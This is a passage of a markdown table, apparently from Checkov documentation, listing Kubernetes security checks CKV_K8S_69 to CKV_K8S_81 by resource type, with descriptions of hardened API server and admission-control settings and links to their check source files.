[ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 3153 | CKV_K8S_69 | resource | CronJob | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 3154 | CKV_K8S_69 | resource | DaemonSet | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 3155 | CKV_K8S_69 | resource | Deployment | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 3156 | CKV_K8S_69 | resource | DeploymentConfig | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 3157 | CKV_K8S_69 | resource | Job | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 3158 | CKV_K8S_69 | resource | Pod | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 3159 | CKV_K8S_69 | resource | PodTemplate | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 3160 | CKV_K8S_69 | 
resource | ReplicaSet | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 3161 | CKV_K8S_69 | resource | ReplicationController | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 3162 | CKV_K8S_69 | resource | StatefulSet | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 3163 | CKV_K8S_70 | resource | CronJob | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 3164 | CKV_K8S_70 | resource | DaemonSet | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 3165 | CKV_K8S_70 | resource | Deployment | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 3166 | CKV_K8S_70 | resource | DeploymentConfig | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 3167 | CKV_K8S_70 | resource | Job | Ensure that the --token-auth-file argument is not set | Kubernetes | 
[ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 3168 | CKV_K8S_70 | resource | Pod | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 3169 | CKV_K8S_70 | resource | PodTemplate | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 3170 | CKV_K8S_70 | resource | ReplicaSet | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 3171 | CKV_K8S_70 | resource | ReplicationController | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 3172 | CKV_K8S_70 | resource | StatefulSet | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 3173 | CKV_K8S_71 | resource | CronJob | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3174 | CKV_K8S_71 | resource | DaemonSet | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3175 | 
CKV_K8S_71 | resource | Deployment | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3176 | CKV_K8S_71 | resource | DeploymentConfig | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3177 | CKV_K8S_71 | resource | Job | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3178 | CKV_K8S_71 | resource | Pod | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3179 | CKV_K8S_71 | resource | PodTemplate | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3180 | CKV_K8S_71 | resource | ReplicaSet | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3181 | CKV_K8S_71 | resource | ReplicationController | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3182 | CKV_K8S_71 | resource | StatefulSet | Ensure that the --kubelet-https argument is set to true | Kubernetes | 
[ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3183 | CKV_K8S_72 | resource | CronJob | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3184 | CKV_K8S_72 | resource | DaemonSet | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3185 | CKV_K8S_72 | resource | Deployment | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3186 | CKV_K8S_72 | resource | DeploymentConfig | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3187 | CKV_K8S_72 | resource | Job | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3188 | CKV_K8S_72 | resource | Pod | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | 
[ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3189 | CKV_K8S_72 | resource | PodTemplate | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3190 | CKV_K8S_72 | resource | ReplicaSet | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3191 | CKV_K8S_72 | resource | ReplicationController | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3192 | CKV_K8S_72 | resource | StatefulSet | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3193 | CKV_K8S_73 | resource | CronJob | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3194 | CKV_K8S_73 | resource | DaemonSet | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | 
[ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3195 | CKV_K8S_73 | resource | Deployment | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3196 | CKV_K8S_73 | resource | DeploymentConfig | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3197 | CKV_K8S_73 | resource | Job | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3198 | CKV_K8S_73 | resource | Pod | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3199 | CKV_K8S_73 | resource | PodTemplate | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3200 | CKV_K8S_73 | resource | ReplicaSet | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | 
[ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3201 | CKV_K8S_73 | resource | ReplicationController | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3202 | CKV_K8S_73 | resource | StatefulSet | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3203 | CKV_K8S_74 | resource | CronJob | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3204 | CKV_K8S_74 | resource | DaemonSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3205 | CKV_K8S_74 | resource | Deployment | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3206 | CKV_K8S_74 | resource | DeploymentConfig | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | 
[ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3207 | CKV_K8S_74 | resource | Job | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3208 | CKV_K8S_74 | resource | Pod | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3209 | CKV_K8S_74 | resource | PodTemplate | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3210 | CKV_K8S_74 | resource | ReplicaSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3211 | CKV_K8S_74 | resource | ReplicationController | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3212 | CKV_K8S_74 | resource | StatefulSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | 
[ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3213 | CKV_K8S_75 | resource | CronJob | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3214 | CKV_K8S_75 | resource | DaemonSet | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3215 | CKV_K8S_75 | resource | Deployment | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3216 | CKV_K8S_75 | resource | DeploymentConfig | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3217 | CKV_K8S_75 | resource | Job | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3218 | CKV_K8S_75 | resource | Pod | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3219 | CKV_K8S_75 | resource | PodTemplate | Ensure that the --authorization-mode argument includes Node | Kubernetes | 
[ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3220 | CKV_K8S_75 | resource | ReplicaSet | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3221 | CKV_K8S_75 | resource | ReplicationController | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3222 | CKV_K8S_75 | resource | StatefulSet | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3223 | CKV_K8S_77 | resource | CronJob | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3224 | CKV_K8S_77 | resource | DaemonSet | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3225 | CKV_K8S_77 | resource | Deployment | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3226 | CKV_K8S_77 | resource | DeploymentConfig | Ensure that the --authorization-mode argument includes RBAC | Kubernetes 
| [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3227 | CKV_K8S_77 | resource | Job | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3228 | CKV_K8S_77 | resource | Pod | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3229 | CKV_K8S_77 | resource | PodTemplate | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3230 | CKV_K8S_77 | resource | ReplicaSet | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3231 | CKV_K8S_77 | resource | ReplicationController | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3232 | CKV_K8S_77 | resource | StatefulSet | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3233 | CKV_K8S_78 | resource | AdmissionConfiguration | Ensure that the admission control plugin EventRateLimit is set | 
Kubernetes | [ApiServerAdmissionControlEventRateLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlEventRateLimit.py) | +| 3234 | CKV_K8S_79 | resource | CronJob | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3235 | CKV_K8S_79 | resource | DaemonSet | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3236 | CKV_K8S_79 | resource | Deployment | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3237 | CKV_K8S_79 | resource | DeploymentConfig | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3238 | CKV_K8S_79 | resource | Job | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3239 | CKV_K8S_79 | resource | Pod | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3240 | 
CKV_K8S_79 | resource | PodTemplate | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3241 | CKV_K8S_79 | resource | ReplicaSet | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3242 | CKV_K8S_79 | resource | ReplicationController | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3243 | CKV_K8S_79 | resource | StatefulSet | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3244 | CKV_K8S_80 | resource | CronJob | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3245 | CKV_K8S_80 | resource | DaemonSet | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3246 | CKV_K8S_80 | resource | Deployment | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | 
[ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3247 | CKV_K8S_80 | resource | DeploymentConfig | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3248 | CKV_K8S_80 | resource | Job | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3249 | CKV_K8S_80 | resource | Pod | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3250 | CKV_K8S_80 | resource | PodTemplate | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3251 | CKV_K8S_80 | resource | ReplicaSet | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3252 | CKV_K8S_80 | resource | ReplicationController | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3253 | CKV_K8S_80 | resource | StatefulSet | Ensure that the admission control 
plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3254 | CKV_K8S_81 | resource | CronJob | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3255 | CKV_K8S_81 | resource | DaemonSet | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3256 | CKV_K8S_81 | resource | Deployment | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | 